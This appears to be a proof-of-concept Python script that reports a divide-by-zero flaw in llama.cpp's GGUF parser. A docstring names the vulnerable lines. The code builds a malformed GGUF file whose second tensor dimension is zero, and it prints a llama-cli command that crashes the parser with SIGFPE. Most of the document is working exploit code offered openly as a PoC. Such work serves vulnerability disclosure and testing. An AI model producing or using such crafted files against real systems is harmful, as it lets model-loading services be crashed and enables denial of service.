"""
PoC: Divide-by-zero in llama.cpp GGUF parser via zero tensor dimension.

Vulnerability: In ggml/src/gguf.cpp lines 550-552, the overflow check does:

    if (ok && ((INT64_MAX/info.t.ne[1] <= info.t.ne[0]) || ...))

The dimensions ne[0..3] are validated for < 0 at line 541 but NOT for == 0.
A dimension of 0 passes the < 0 check, then INT64_MAX / 0 triggers
undefined behavior (divide-by-zero crash / SIGFPE on most platforms).

Attack vector:
- Craft a GGUF file with 1 tensor
- Tensor has n_dims=2, ne[0]=32 (valid for F32 block size), ne[1]=0
- ne[2] and ne[3] default to 1 (set at line 535)
- The parser reads ne[0]=32, ne[1]=0, then at line 550:
  INT64_MAX / info.t.ne[1] => INT64_MAX / 0 => CRASH

GGUF v3 binary format for tensor info:
- name: string (uint64 length + chars)
- n_dims: uint32
- ne[0..n_dims-1]: int64 each
- type: int32 (ggml_type)
- offset: uint64
"""

import struct
import os


# GGUF container constants (all multi-byte fields are little-endian).
GGUF_MAGIC = b"GGUF"        # 4-byte magic at file offset 0
GGUF_VERSION = 3            # GGUF format version written in the header
GGUF_TYPE_STRING = 8        # gguf_type tag: KV value is a string
GGUF_TYPE_UINT32 = 4        # gguf_type tag: KV value is a uint32

# ggml tensor element type identifiers.
GGML_TYPE_F32 = 0           # 32-bit float tensor data
|
def write_string(f, s):
    """Write a GGUF string to *f*: uint64 little-endian length + UTF-8 chars.

    No null terminator is appended (per the GGUF spec's string encoding).
    """
    encoded = s.encode('utf-8')
    f.write(struct.pack('<Q', len(encoded)))
    f.write(encoded)
|
|
|
|
def write_kv_string(f, key, value):
    """Write one metadata KV pair with a string value.

    Layout: key (GGUF string), value-type tag (uint32 = GGUF_TYPE_STRING),
    then the value (GGUF string).
    """
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_STRING))
    write_string(f, value)
|
|
|
|
def create_divzero_gguf(output_path):
    """Create a GGUF file with a tensor whose ne[1]=0, triggering divide-by-zero.

    Writes a minimal but structurally valid GGUF v3 file containing one KV
    pair and one tensor-info record whose second dimension is 0, which the
    vulnerable overflow check divides by.
    """
    n_tensors = 1
    n_kv = 1

    with open(output_path, 'wb') as f:
        # --- GGUF header: magic, version, tensor count, KV count ---
        f.write(GGUF_MAGIC)
        f.write(struct.pack('<I', GGUF_VERSION))
        f.write(struct.pack('<Q', n_tensors))
        f.write(struct.pack('<Q', n_kv))

        # --- KV section: one pair so the file looks like a real model ---
        write_kv_string(f, "general.architecture", "llama")

        # --- tensor info record ---
        # Tensor name.
        write_string(f, "weight")

        # n_dims = 2, so the parser reads exactly two ne[] values.
        f.write(struct.pack('<I', 2))

        # ne[0] = 32: a multiple of the F32 block size, so it passes the
        # block-size validation before the overflow check runs.
        f.write(struct.pack('<q', 32))

        # ne[1] = 0: passes the "< 0" check but makes the overflow guard
        # compute INT64_MAX / 0 — the divide-by-zero trigger.
        f.write(struct.pack('<q', 0))

        # Tensor element type: F32.
        f.write(struct.pack('<i', GGML_TYPE_F32))

        # Data offset within the (empty) tensor-data section.
        f.write(struct.pack('<Q', 0))

        # Pad the file to the default GGUF alignment (32 bytes) so the
        # tensor-data section starts at an aligned offset.
        current_pos = f.tell()
        alignment = 32
        padding_needed = (alignment - (current_pos % alignment)) % alignment
        f.write(b'\x00' * padding_needed)

    file_size = os.path.getsize(output_path)
    print(f"[*] Created: {output_path}")
    print(f"[*] File size: {file_size} bytes")
    print(f"[*] Tensor: name='weight', n_dims=2, ne=[32, 0, 1, 1], type=F32")
    print(f"[*] Vulnerability: INT64_MAX / ne[1] = INT64_MAX / 0 => divide-by-zero")
    print(f"[*]")
    print(f"[*] Test with:")
    print(f"[*]   ./llama-cli -m {output_path} -p 'hello'")
    print(f"[*] Expected: Floating point exception (SIGFPE) or crash")
|
|
|
|
if __name__ == "__main__":
    # Write the PoC into a cwd-relative directory instead of a hard-coded
    # user-specific absolute path, so the script runs on any machine.
    out_dir = "gguf_poc"
    os.makedirs(out_dir, exist_ok=True)
    output_path = os.path.join(out_dir, "poc_divzero.gguf")
    create_divzero_gguf(output_path)
|
|